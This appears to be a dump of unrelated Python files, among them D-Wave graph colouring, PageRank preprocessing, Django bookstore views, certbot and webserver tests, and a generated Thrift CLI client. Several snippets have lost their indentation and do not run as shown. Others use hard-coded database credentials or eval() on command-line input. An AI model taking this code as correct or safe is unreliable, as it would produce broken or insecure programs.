                      zaxis_title='Test Accuracy'),
                  width=700,
                  margin=dict(r=20, b=10, l=10, t=10))
fig.show()
997,774 | 2e5ab912cc4c6852e5a571518f6a0d6dcd013d2d | # modified from code at https://docs.ocean.dwavesys.com/en/stable/examples/map_coloring_full_code.html
import dwavebinarycsp
from neal import SimulatedAnnealingSampler
from dwave.system import DWaveSampler, EmbeddingComposite
import networkx as nx
import matplotlib.pyplot as plt
from datetime import datetime
import pickle
from pprint import pprint
import hybrid
hybrid.logger.setLevel(hybrid.logging.DEBUG)
def backup(expName, samples):
    """Pickle *samples* to data/<expName><timestamp> as a crude run backup."""
    with open("data/"+expName + str(datetime.now()), "wb") as f:
        pickle.dump(samples, f)
wa_out = "{2, 3, 4, 5} | {1, 3} | {1, 2, 5, 31, 32} | {1, 5, 6, 7} | {1, 3, 4, 6, 8, 27, 31, 42} | {4, 5, 7, 8, 9, 10} | {4, 6, 10} | {5, 6, 9, 18, 19, 33, 34, 42} | {6, 8, 10, 13, 17, 18} | {6, 7, 9, 13} | {12, 13, 14, 15} | {11, 14, 16} | {9, 10, 11, 17} | {11, 12, 15, 16, 38} | {11, 14, 17, 20, 38} | {12, 14, 38, 40} | {9, 13, 15, 18, 19, 20} | {8, 9, 17, 19} | {8, 17, 18, 20, 33, 36} | {15, 17, 19, 36, 38, 39} | {22, 23, 24} | {21, 23, 24, 46, 47} | {21, 22, 29, 30, 47} | {21, 22} | {26, 27} | {25, 27, 28, 30, 45} | {5, 25, 26, 31, 42, 45} | {26, 29, 30} | {23, 28, 30} | {23, 26, 28, 29, 44, 45} | {3, 5, 27, 32} | {3, 31} | {8, 19, 34, 35, 36, 37} | {8, 33, 37, 41, 42} | {33, 36, 37, 49} | {19, 20, 33, 35, 39, 49} | {33, 34, 35, 43} | {14, 15, 16, 20, 39, 40} | {20, 36, 38, 49} | {16, 38} | {34, 42, 43, 44} | {5, 8, 27, 34, 41, 44, 45} | {37, 41, 44} | {30, 41, 42, 43, 45} | {26, 27, 30, 42, 44} | {22, 47, 48} | {22, 23, 46} | {46} | {35, 36, 39}".replace(" ","")
wa_singlets = wa_out.split("|")
cleaned = []
for singlet in wa_singlets:
cleaned.append(singlet.replace("{","").replace("}","").split(","))
#print(cleaned)
vertices = []
for i in range(1,len(wa_singlets)+1):
vertices.append(str(i))
#print(vertices)
edges = []
for i in range(0, len(cleaned)):
for j in range(len(cleaned[i])):
edges.append((str(i+1), cleaned[i][j]))
#print(edges)
def not_same_color(v, u):
    """Colour-clash constraint: the same colour bit may not be on in both regions.

    Truthy/truthy -> False (clash); every other combination -> True.
    """
    return (not v) or (not u)
# Valid assignments for a region's colour variables: exactly one bit set.
one_hot_encoding = {(0,0,0,1), (0,0,1,0), (0,1,0,0), (1,0,0,0)}
colors = len(one_hot_encoding)  # palette size (4)
def plot_map(sample):
    """Draw the sampled colouring (one node per region) and save it to out.png.

    sample maps variable names "<region>_<colour-index>" to 0/1 bits.
    """
    G = nx.Graph()
    G.add_nodes_from(vertices)
    G.add_edges_from(edges)
    # Translate from binary to integer color representation
    color_map = {}
    for state in vertices:
        for i in range(colors):
            if sample[state+"_"+str(i)]:
                color_map[state] = i
    # Plot the sample with color-coded nodes
    node_colors = [color_map.get(node) for node in G.nodes()]
    nx.draw_planar(G, with_labels=True, node_color=node_colors, node_size=10, cmap=plt.cm.rainbow)
    plt.savefig("out.png")
# Build the CSP: four binary variables per region, one per palette colour.
csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
for state in vertices:
    variables = [state+"_"+str(i) for i in range(colors)]
    csp.add_constraint(one_hot_encoding, variables)  # exactly one colour on
# Adjacent regions may not share any colour bit.
for neighbor in edges:
    v,u = neighbor
    for i in range(colors):
        variables = [v+"_"+str(i), u+"_"+str(i)]
        csp.add_constraint(not_same_color, variables)
bqm = dwavebinarycsp.stitch(csp)
# Hybrid workflow: race an interruptable tabu sampler against QPU-sampled
# subproblems, keep the lowest-energy branch, loop until convergence=3.
workflow = hybrid.Loop(
    hybrid.RacingBranches(
        hybrid.InterruptableTabuSampler(max_time=0),
        hybrid.EnergyImpactDecomposer(size=100, rolling=True, rolling_history=0.3) | hybrid.QPUSubproblemAutoEmbeddingSampler(num_reads=1)| hybrid.SplatComposer()
    )| hybrid.ArgMin() ,
    convergence=3
)
result = hybrid.HybridSampler(workflow).sample(bqm)
hybrid.Unwind(workflow)
print("Solution: sample={}".format(result.first))
hybrid.print_structure(workflow)
print("-----------------------")
hybrid.print_counters(workflow)
997,775 | fe885f9ba22f347dd4351a3eb6bc21fc51657978 | fromnetid = 0.6642
# Edges whose weight falls in [rejectmin, rejectlimit) are dropped below.
rejectmin = 0.99 * fromnetid
rejectlimit = rejectmin + 0.01
f = open('edges.txt', 'r')
fo = open('edges-output.txt', 'w')
count = 0
#PR = float((1.0/685229.0)*(1.0-0.85))
# Uniform initial PageRank over 685230 nodes.
PR = float(1.0/685230.0)
print PR
# State carried across lines while grouping edges by source node:
prevdata = 0       # source node of the previous edge
degree = 0         # out-degree accumulated for the current source
list_output = ''   # tab-separated adjacency list for the current source
prevdata1 = 0      # destination of the previous edge
flag = 0           # unused
tab = '\t'
delim = '\t'
edge_count = 0
for line in f:
    # Normalise whitespace, then split into (src, dst, weight).
    line1 = ' '.join(line.split())
    data = line1.split(' ')
    if len(data) < 3:
        print "fucked!"
    # Keep the edge only if its weight lies outside the reject band.
    if not(((float(data[2]) >= float(rejectmin)) and (float(data[2]) < float(rejectlimit)))):
        edge_count = edge_count + 1
        if (int(data[0]) == int(prevdata)):
            # Same source as the previous edge: extend its adjacency list.
            degree += 1
            list_output += data[1]+delim
            continue
        elif degree == 0:
            # NOTE(review): reached on the first edge of a new source when the
            # previous source had exactly one edge; re-emits the previous
            # destination — confirm this matches the intended record format.
            list_output += str(prevdata1)+delim
            degree = 1
        # Flush the previous source: node \t PR \t degree \t neighbours.
        output = str(prevdata)+tab+str(PR)+delim+str(degree)+delim+list_output+"\n"
        #print str(output)
        fo.write(str(output))
        prevdata = data[0]
        prevdata1 = data[1]
        degree = 0
        list_output = ''
# Flush the final source node.
# NOTE(review): the two branches disagree — one omits the trailing newline,
# the other omits the neighbour list — verify against the expected output.
if degree == 0:
    output = str(data[0])+tab+str(PR)+delim+str(degree+1)+delim+str(data[1])
else:
    output = str(data[0])+tab+str(PR)+delim+str(degree)+delim+"\n"
#print str(output)
fo.write(str(output))
print "edge count is"
print edge_count
f.close()
fo.close()
|
997,776 | 0d7f3acce257f314a5e3e67a87e636a012b44573 | class Time(object):
"""Time of day.attributes: hour, minute, second"""
# Two sample times for exercising is_after(): t1 = 11:59:30, t2 = 10:45:25.
t1 = Time()
t1.hour = 11
t1.minute = 59
t1.second = 30
t2 = Time()
t2.hour = 10
t2.minute = 45
t2.second = 25
def is_after(t1, t2):
    """Return True when t1 represents a strictly later time of day than t2."""
    def _total_seconds(t):
        # Collapse hour/minute/second into one comparable count of seconds.
        return (t.hour * 60 + t.minute) * 60 + t.second
    return _total_seconds(t1) > _total_seconds(t2)
# Expect True: 11:59:30 is after 10:45:25.
print(is_after(t1, t2))
|
997,777 | 0e52356e89e04ac83da42c77eba76e39d1134d1a | from datetime import datetime
from django.shortcuts import render, redirect, get_object_or_404 , reverse
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView
from django.db.models import Q
from django.http import JsonResponse
from django.core.paginator import Paginator
import json
from django.core import serializers
from .models import *
from .models import Book
# Create your views here.
@login_required
def profile(request):
    """Render the profile page with the user's single open (incomplete) order.

    NOTE(review): Order.objects.get raises DoesNotExist/MultipleObjectsReturned
    unless exactly one open order exists — confirm one is always present.
    """
    order = Order.objects.get(user=request.user, order_completion_status=False)
    context = {'order':order}
    return render(request, 'profile.html', context)
def about(request):
    """Render the About page, including the open order (for the cart badge) when one exists."""
    try:
        order = Order.objects.get(user=request.user, order_completion_status=False)
        context = {'order': order}
    except Exception:
        # Narrowed from a bare `except:` (which also swallowed SystemExit /
        # KeyboardInterrupt). Reached e.g. for anonymous users or when no
        # single open order exists; fall back to an empty context.
        context = {}
    return render(request, 'about.html', context)
@login_required
def read(request, pk):
    """Serve the reader page for book *pk*, but only if the user has bought it."""
    requested_book = Book.objects.get(id=pk)
    owned_ids = []
    # Collect the ids of every book in the user's completed orders.
    for past_order in Order.objects.filter(user=request.user):
        if past_order.order_completion_status:
            owned_ids.extend(item.book.id for item in past_order.orderitem_set.all())
    if pk in owned_ids:
        return render(request, 'read.html', {'book': requested_book})
    return render(request, 'no_permisson.html', {'id': pk})
@login_required
def books(request):
    """List all books, marking those the user already owns and exposing the open order.

    books_bought holds the ids of books in completed orders; orders_ongo is the
    (created-on-demand) open order used for the cart badge.
    """
    books = Book.objects.all()
    books_bought = []
    try:
        for order in Order.objects.filter(user=request.user):
            if order.order_completion_status:
                books_bought.extend(item.book.id for item in order.orderitem_set.all())
        orders_ongo, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    except Exception:
        # Narrowed from a bare `except:`; still ensure an open order exists.
        orders_ongo, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    context = {'books': books, 'order': orders_ongo, 'books_bought': books_bought}
    return render(request, 'books/book_list.html', context)
# class BooksListView(ListView):
# model = Book
# context_object_name = "books"
# def get_context_data(self, **kwargs):
# user = get_user_model()
# order, created = Order.objects.get_or_create(user=user.username,order_completion_status=False)
# context = super(BooksListView, self).get_context_data(**kwargs)
# context.update({'get_total_cart_items':order.get_total_cart_items})
# return context
@login_required
def detail(request, pk):
    """Show one book's detail page.

    books_bought marks whether the user already owns this (or any) book;
    `orders` is the open order exposed for the cart badge.
    """
    book = Book.objects.get(id=pk)
    books_bought = []
    try:
        for order in Order.objects.filter(user=request.user, order_completion_status=True):
            books_bought.extend(item.book.id for item in order.orderitem_set.all())
        orders, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    except Exception:
        # Narrowed from a bare `except:`; still ensure an open order exists.
        orders, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    context = {'book': book, 'order': orders, 'books_bought': books_bought}
    return render(request, 'books/book_detail.html', context)
# class BooksDetailView(DetailView):
# model = Book
# context_object_name = "book"
@login_required
def add_to_cart(request, operation, pk):
    """Adjust the quantity of book *pk* in the user's open order, then redirect.

    operation: "add"/"addition" increments, "remove" decrements, "delete" zeroes.
    A non-positive quantity removes the line item entirely.
    """
    book = get_object_or_404(Book, id=pk)
    order, _created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    line_item, _created = OrderItem.objects.get_or_create(book=book, order=order)
    if operation in ("add", "addition"):
        line_item.quantity += 1
    elif operation == "remove":
        line_item.quantity -= 1
    elif operation == "delete":
        line_item.quantity = 0
    line_item.save()
    if line_item.quantity <= 0:
        line_item.delete()
    # "addition" comes from the list page, everything else from the cart.
    return redirect('book-list' if operation == "addition" else 'checkout')
@login_required
def add_to_cart_ajax(request):
    """AJAX twin of add_to_cart(): adjust an item's quantity and return JSON.

    Expects a JSON body {"itemid": <book pk>, "operation": "add"|"addition"|
    "remove"|"delete"}; responds with the item's new quantity and the order's
    total item count for the cart badge.
    """
    data = json.loads(request.body)
    pk= data['itemid']
    operation = data['operation']
    user = request.user
    book = get_object_or_404(Book, id=pk)
    order, created = Order.objects.get_or_create(user=user,order_completion_status=False)
    orderItem, created = OrderItem.objects.get_or_create(book=book, order=order)
    # orderItem.quantity +=1
    # orderItem.save()
    if operation=="add" or operation=="addition":
        orderItem.quantity +=1
    elif operation =="remove":
        orderItem.quantity -=1
    elif operation =="delete":
        orderItem.quantity = 0
    orderItem.save()
    if orderItem.quantity <=0:
        orderItem.delete()
    # NOTE(review): after delete() the in-memory quantity (<= 0) is still
    # reported below — confirm the client expects that.
    cartvalue = {'cartItem':orderItem.quantity, 'total_cart_items':order.get_total_cart_items}
    print(cartvalue)
    return JsonResponse(cartvalue,safe=False)
def books_not_bought(user):
    """Return the Book objects *user* has not yet purchased.

    FIX: on a lookup failure (e.g. an anonymous user) this now returns an
    empty list instead of the bare bool True, which made callers such as
    checkout() crash inside Paginator.
    """
    all_books = list(Book.objects.all())
    try:
        bought_ids = []
        for order in Order.objects.filter(user=user, order_completion_status=True):
            bought_ids.extend(item.book.id for item in order.orderitem_set.all())
        return [book for book in all_books if book.id not in bought_ids]
    except Exception:
        # Narrowed from a bare `except:`; treat failure as "nothing to show".
        return []
@login_required
def checkout(request):
    """Render the cart/checkout page.

    GET: shows the open order's items plus page 1 of a 3-per-page paginator
    over books the user has not bought yet.
    POST (AJAX): returns a JSON map describing every paginator page
    (first book's id and cover image URL, plus prev/next flags).
    """
    user=request.user
    # NOTE(review): books_not_bought() can return True on lookup failure,
    # which would crash Paginator below — confirm that path is unreachable.
    books_not_bought_list = books_not_bought(user)
    paginator= Paginator(books_not_bought_list, 3)
    books = Book.objects.all()
    order, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
    orderItems = order.orderitem_set.all()
    # paginator= Paginator(books_not_bought_list, 3)
    # print('books', paginator.count)
    page = paginator.page(1)
    context = {'orderItems':orderItems, 'order':order, 'books':books , 'page':page}
    details = {}
    if request.method == "POST":
        for page in paginator.page_range:
            book = paginator.page(page)
            book_data = book.object_list[0]
            details[page]={'id':book_data.id, 'image':book_data.image.url}
            # NOTE(review): prev/next are overwritten each iteration, so they
            # end up describing only the last page — confirm intended.
            if page == 1:
                details['prev']=False
            else:
                details['prev']=True
            if page == paginator.num_pages:
                details['next']=False
            else:
                details['next']=True
        page_data = json.loads(request.body)
        # pages = serializers.serialize('json', [page,])
        page_info = {'page':details}
        print('bookssssssssssssssssssss', page_data)
        return JsonResponse(page_info,safe=False)
    return render(request, 'checkout.html', context)
@login_required
def payment(request):
    """Show the payment page; on POST mark the open order as completed.

    Removed the unused `books = Book.objects.all()` local (dead code — the
    lazy queryset was never evaluated or passed to the template).
    """
    order, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    orderItems = order.orderitem_set.all()
    context = {'orderItems': orderItems, 'order': order}
    if request.method == "POST":
        # "Payment" is simulated: just close the order and stamp the date.
        order.order_completion_status = True
        order.date_of_order = datetime.now()
        order.save()
        return redirect('book-list')
    return render(request, 'payment.html', context)
@login_required
def completed_orders(request):
    """List every line item from the user's completed orders."""
    # Ensure an open order exists so the cart badge can render.
    ongoing_order, _created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    purchased_items = []
    for past_order in Order.objects.filter(user=request.user, order_completion_status=True):
        purchased_items.extend(past_order.orderitem_set.all())
    context = {'orderItems': purchased_items, 'order': ongoing_order}
    return render(request, 'completed_orders.html', context)
# class SearchResultsView(ListView):
# model = Book
# template_name = "search_results.html"
# context_object_name = 'search_book_results'
# def get_queryset(self):
# query = self.request.GET['val1']
# return Book.objects.filter(title__icontains=query )
@login_required
def search(request):
    """Search book titles/authors for the GET 'search_value' query.

    Also marks books the user already owns and exposes the open order for
    the cart badge, mirroring books().
    """
    query = request.GET['search_value']
    books = Book.objects.filter(Q(title__icontains = query) | Q(author__icontains = query) )
    books_bought = []
    try:
        for order in Order.objects.filter(user=request.user):
            if order.order_completion_status:
                books_bought.extend(item.book.id for item in order.orderitem_set.all())
        orders, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    except Exception:
        # Narrowed from a bare `except:`; still ensure an open order exists.
        orders, created = Order.objects.get_or_create(user=request.user, order_completion_status=False)
    context = {'books': books, 'order': orders, 'books_bought': books_bought}
    return render(request, 'search_results.html', context)
# def error_handler(request):
# return redirect('book-list')
def error_404_view(request, exception):
    """Custom 404 handler; Django invokes handler404 as callback(request, exception=...).

    FIX: renamed the misspelled parameter 'execption' -> 'exception' — Django
    passes this argument by keyword, so the misspelling raised TypeError
    instead of rendering the page.
    """
    return render(request, 'error_404.html')
def error_handler(request, exception, template_name="error_404.html"):
    """Render *template_name* with HTTP status 404.

    FIX: the original referenced an undefined `response` (guaranteed
    NameError) and never rendered anything; build the response explicitly.
    Also renamed the misspelled 'execption' parameter to 'exception'.
    """
    response = render(request, template_name)
    response.status_code = 404
    return response
997,778 | 1954623bcfbd08f7cd9d9af53593217ae861cfd5 | """Repeating a beat in a loop."""
__author__ = "730330944"
# Begin your solution here...
beat: str = input("What beat do you want to repeat? ")
beat_repeat: str = beat
repeat: int = int(input("How many times do you want to repeat it? "))
if(repeat <= 0):
print("No beat...")
else:
while repeat-1 > 0:
beat_repeat += " " + beat
repeat -= 1
print(beat_repeat)
|
997,779 | fb1163e6c30966a80510663a25758826e99d75b3 | from __future__ import print_function, unicode_literals
from clckwrkbdgr import unittest
from clckwrkbdgr.unittest import mock
import os
import mimetypes
from .. import webserver
class MockPopen(object):
    """Minimal stand-in for subprocess.Popen that returns canned results."""
    def __init__(self, rc, stdout, stderr):
        # rc: exit code wait() reports; stdout/stderr: what communicate() returns.
        self.rc = rc
        self.stdout = stdout
        self.stderr = stderr
    def communicate(self, stdin):
        # stdin is accepted for signature compatibility but ignored.
        return self.stdout, self.stderr
    def wait(self):
        return self.rc
class TestWebResponses(unittest.fs.TestCase):
def setUp(self):
self.setUpPyfakefs(modules_to_reload=[webserver])
self.fs.create_dir('/data')
def should_prepare_base_response(self):
response = webserver.Response(200, b'content', content_type='text/html', content_encoding='utf-8')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
def should_prepare_response_from_file(self):
self.fs.create_file('/data/file.md', contents='content')
response = webserver.FileContentResponse(200, '/data/file.md', content_type='text/html', content_encoding='utf-8')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
with open('/data/file.md', 'w') as f: f.write('content')
response = webserver.FileContentResponse(200, '/data/file.md')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
expected_content_type, _ = mimetypes.guess_type('/data/file.md')
self.assertEqual(response.get_headers(), {'Content-Type':expected_content_type or 'text/plain'})
self.fs.create_file('/data/file.jpg', contents='content')
response = webserver.FileContentResponse(200, '/data/file.jpg')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'image/jpeg'})
self.fs.create_file('/data/file.html', contents='<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><body></body>')
response = webserver.FileContentResponse(200, '/data/file.html')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><body></body>')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html'})
@mock.patch('subprocess.Popen', side_effect=[
MockPopen(0, b'CONTENT' + os.linesep.encode(), b''),
MockPopen(1, b'', b'ERROR'),
])
@mock.patch('clckwrkbdgr.webserver.base_log_message')
def should_prepare_cgi_response(self, base_log_message, popen):
self.fs.create_file('/data/file.md', contents='content')
response = webserver.CGIResponse(200, '/data/file.md', 'python -c "import six; print(six.moves.input().upper())"')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'CONTENT' + os.linesep.encode())
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
response = webserver.CGIResponse(200, '/data/file.md', 'unknown_command')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
base_log_message.assert_has_calls([
mock.call('CGI process exited with %d', 1),
mock.call('Error during processing CGI:\n%s', str(b'ERROR')),
])
|
997,780 | d454e80535c7a702d97acc28eaf387ed0713e938 | """ Tests for ParserNode interface """
import sys
import pytest
from certbot_apache._internal import interfaces
from certbot_apache._internal import parsernode_util as util
class DummyParserNode(interfaces.ParserNode):
""" A dummy class implementing ParserNode interface """
def __init__(self, **kwargs):
"""
Initializes the ParserNode instance.
"""
ancestor, dirty, filepath, metadata = util.parsernode_kwargs(kwargs)
self.ancestor = ancestor
self.dirty = dirty
self.filepath = filepath
self.metadata = metadata
super().__init__(**kwargs)
def save(self, msg): # pragma: no cover
"""Save"""
pass
def find_ancestors(self, name): # pragma: no cover
""" Find ancestors """
return []
class DummyCommentNode(DummyParserNode):
""" A dummy class implementing CommentNode interface """
def __init__(self, **kwargs):
"""
Initializes the CommentNode instance and sets its instance variables.
"""
comment, kwargs = util.commentnode_kwargs(kwargs)
self.comment = comment
super().__init__(**kwargs)
class DummyDirectiveNode(DummyParserNode):
""" A dummy class implementing DirectiveNode interface """
# pylint: disable=too-many-arguments
def __init__(self, **kwargs):
"""
Initializes the DirectiveNode instance and sets its instance variables.
"""
name, parameters, enabled, kwargs = util.directivenode_kwargs(kwargs)
self.name = name
self.parameters = parameters
self.enabled = enabled
super().__init__(**kwargs)
def set_parameters(self, parameters): # pragma: no cover
"""Set parameters"""
pass
class DummyBlockNode(DummyDirectiveNode):
""" A dummy class implementing BlockNode interface """
def add_child_block(self, name, parameters=None, position=None): # pragma: no cover
"""Add child block"""
pass
def add_child_directive(self, name, parameters=None, position=None): # pragma: no cover
"""Add child directive"""
pass
def add_child_comment(self, comment="", position=None): # pragma: no cover
"""Add child comment"""
pass
def find_blocks(self, name, exclude=True): # pragma: no cover
"""Find blocks"""
pass
def find_directives(self, name, exclude=True): # pragma: no cover
"""Find directives"""
pass
def find_comments(self, comment, exact=False): # pragma: no cover
"""Find comments"""
pass
def delete_child(self, child): # pragma: no cover
"""Delete child"""
pass
def unsaved_files(self): # pragma: no cover
"""Unsaved files"""
pass
interfaces.CommentNode.register(DummyCommentNode)
interfaces.DirectiveNode.register(DummyDirectiveNode)
interfaces.BlockNode.register(DummyBlockNode)
def test_dummy():
"""Dummy placeholder test case for ParserNode interfaces"""
dummyblock = DummyBlockNode(
name="None",
parameters=(),
ancestor=None,
dirty=False,
filepath="/some/random/path"
)
dummydirective = DummyDirectiveNode(
name="Name",
ancestor=None,
filepath="/another/path"
)
dummycomment = DummyCommentNode(
comment="Comment",
ancestor=dummyblock,
filepath="/some/file"
)
if __name__ == "__main__":
sys.exit(pytest.main(sys.argv[1:] + [__file__])) # pragma: no cover
|
997,781 | 0a9985334493d2f2fe5bbd9ea521e825549f9f99 | """
Quick program to add crimes into the database
"""
import csv
import psycopg2
# NOTE(review): database credentials are hard-coded (password redacted
# upstream) — load them from the environment or a config file instead.
conn = psycopg2.connect(host="localhost",database="DirectedStudiesFall2019", user="postgres", password="REDACTED")
cur = conn.cursor()
with open('random_blocks_with_location.csv', 'r') as f:
    reader = csv.reader(f)
    next(reader) # Skip the header row.
    for row in reader:
        # Parameterised insert — psycopg2 handles quoting/escaping of values.
        cur.execute(
            "INSERT INTO random_with_location VALUES (%s, %s, %s, %s,%s, %s, %s)",
            row
        )
conn.commit()  # single commit for the whole batch
|
997,782 | 8ed1b87ac8ad54ee9ae36c43de379f776a7a324e | from django.urls import path,include
from post.api.views import PostListAPIView,PostCreatelAPIView,PostDetailAPIView,PostUpdatelAPIView
app_name="post"
urlpatterns = [
path("list",PostListAPIView.as_view(),name="list"),
path("detail/<slug>",PostDetailAPIView.as_view(),name="detail"),
path("update/<slug>",PostUpdatelAPIView.as_view(),name="update"),
path("create",PostCreatelAPIView.as_view(),name="create")
]
|
997,783 | 3b58a3dc2afc8fde0902ccf87f0acf0419edfdc8 | import math
x = int(input("Enter a number between 1-10"))
y = int(input("ENter another number between 1-10"))
cal = x ** y
print(cal)
cal2 = math.sqrt(cal)
print(cal2)
while cal2<100000:
cal2 = cal2+1
if cal2 == 100000:
print(cal2) |
997,784 | 4eea87d00d8e76066af317be19440f8aeb7c1db6 | import turtle as t
# Turtle is imported above under the short alias "t" so the full module name
# need not be typed each time.  (Comments translated from Korean.)
n = 60 # draw the circle 60 times
t.shape('turtle') # use the turtle cursor shape; arrows etc. are also available
t.speed('fastest') # set the turtle to its fastest drawing speed
for i in range(n):
    t.circle(120) # draw a circle of radius 120
    t.right(360 / n)
t.mainloop() # keep the window open instead of exiting immediately
# Disabled spiral variant:
# t.shape('turtle')
# t.speed('fastest') # set the turtle to its fastest drawing speed
# for i in range(600): # repeat 600 times
#     t.forward(i) # move forward i units; the line grows each iteration
#     t.right(90)
t.mainloop()  # NOTE(review): duplicate — only reached after the first mainloop() returns
997,785 | 2c2bd5bed50ebc69759323bb6af5aff4850ed966 | #!/usr/bin/env python
#
# Autogenerated by Thrift Compiler (0.7.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
import sys
import pprint
from urlparse import urlparse
from thrift.transport import TTransport
from thrift.transport import TSocket
from thrift.transport import THttpClient
from thrift.protocol import TBinaryProtocol
import INotificationsThriftService
from ttypes import *
if len(sys.argv) <= 1 or sys.argv[1] == '--help':
print ''
print 'Usage: ' + sys.argv[0] + ' [-h host:port] [-u url] [-f[ramed]] function [arg1 [arg2...]]'
print ''
print 'Functions:'
print ' StateResult sendInf(Info info)'
print ' StateResult batchSendInf( infos)'
print ' StateResult markProcessed(string mid)'
print ' StateResult markRead(string mid)'
print ' queryInfo(string appId, string type, string receiverId, string objectId)'
print ' StateResult replaceInf(Info info)'
print ' StateResult batchReplaceInf( infos)'
print ' listAll(string receiverId, string status, i64 from, i32 size)'
print ' listAllOfApp(string appId, string receiverId, string status, i64 from, i32 size)'
print ' listById(string receiverId, string status, i64 mid, i32 count)'
print ' listOfAppById(string appId, string receiverId, string status, i64 mid, i32 count)'
print ' listByTime(string receiverId, string status, i64 from, i32 count)'
print ' listOfAppByTime(string appId, string receiverId, string status, i64 from, i32 count)'
print ' top(string receiverId, string status, i32 topn)'
print ' topOfApp(string appId, string receiverId, string status, i32 topn)'
print ' i32 count(string receiverId, string status)'
print ' i32 countOfApp(string appId, string receiverId, string status)'
print ' string send(string message)'
print ' string batchSend(string messages)'
print ' string process(string mid)'
print ' string query(string appId, string type, string receiverId, string objectId)'
print ' string replace(string message)'
print ' string batchReplace(string messages)'
print ''
sys.exit(0)
pp = pprint.PrettyPrinter(indent = 2)
host = 'localhost'
port = 9090
uri = ''
framed = False
http = False
argi = 1
if sys.argv[argi] == '-h':
parts = sys.argv[argi+1].split(':')
host = parts[0]
port = int(parts[1])
argi += 2
if sys.argv[argi] == '-u':
url = urlparse(sys.argv[argi+1])
parts = url[1].split(':')
host = parts[0]
if len(parts) > 1:
port = int(parts[1])
else:
port = 80
uri = url[2]
if url[4]:
uri += '?%s' % url[4]
http = True
argi += 2
if sys.argv[argi] == '-f' or sys.argv[argi] == '-framed':
framed = True
argi += 1
cmd = sys.argv[argi]
args = sys.argv[argi+1:]
if http:
transport = THttpClient.THttpClient(host, port, uri)
else:
socket = TSocket.TSocket(host, port)
if framed:
transport = TTransport.TFramedTransport(socket)
else:
transport = TTransport.TBufferedTransport(socket)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = INotificationsThriftService.Client(protocol)
transport.open()
if cmd == 'sendInf':
if len(args) != 1:
print 'sendInf requires 1 args'
sys.exit(1)
pp.pprint(client.sendInf(eval(args[0]),))
elif cmd == 'batchSendInf':
if len(args) != 1:
print 'batchSendInf requires 1 args'
sys.exit(1)
pp.pprint(client.batchSendInf(eval(args[0]),))
elif cmd == 'markProcessed':
if len(args) != 1:
print 'markProcessed requires 1 args'
sys.exit(1)
pp.pprint(client.markProcessed(args[0],))
elif cmd == 'markRead':
if len(args) != 1:
print 'markRead requires 1 args'
sys.exit(1)
pp.pprint(client.markRead(args[0],))
elif cmd == 'queryInfo':
if len(args) != 4:
print 'queryInfo requires 4 args'
sys.exit(1)
pp.pprint(client.queryInfo(args[0],args[1],args[2],args[3],))
elif cmd == 'replaceInf':
if len(args) != 1:
print 'replaceInf requires 1 args'
sys.exit(1)
pp.pprint(client.replaceInf(eval(args[0]),))
elif cmd == 'batchReplaceInf':
if len(args) != 1:
print 'batchReplaceInf requires 1 args'
sys.exit(1)
pp.pprint(client.batchReplaceInf(eval(args[0]),))
elif cmd == 'listAll':
if len(args) != 4:
print 'listAll requires 4 args'
sys.exit(1)
pp.pprint(client.listAll(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listAllOfApp':
if len(args) != 5:
print 'listAllOfApp requires 5 args'
sys.exit(1)
pp.pprint(client.listAllOfApp(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'listById':
if len(args) != 4:
print 'listById requires 4 args'
sys.exit(1)
pp.pprint(client.listById(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listOfAppById':
if len(args) != 5:
print 'listOfAppById requires 5 args'
sys.exit(1)
pp.pprint(client.listOfAppById(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'listByTime':
if len(args) != 4:
print 'listByTime requires 4 args'
sys.exit(1)
pp.pprint(client.listByTime(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listOfAppByTime':
if len(args) != 5:
print 'listOfAppByTime requires 5 args'
sys.exit(1)
pp.pprint(client.listOfAppByTime(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'top':
if len(args) != 3:
print 'top requires 3 args'
sys.exit(1)
pp.pprint(client.top(args[0],args[1],eval(args[2]),))
elif cmd == 'topOfApp':
if len(args) != 4:
print 'topOfApp requires 4 args'
sys.exit(1)
pp.pprint(client.topOfApp(args[0],args[1],args[2],eval(args[3]),))
elif cmd == 'count':
if len(args) != 2:
print 'count requires 2 args'
sys.exit(1)
pp.pprint(client.count(args[0],args[1],))
elif cmd == 'countOfApp':
if len(args) != 3:
print 'countOfApp requires 3 args'
sys.exit(1)
pp.pprint(client.countOfApp(args[0],args[1],args[2],))
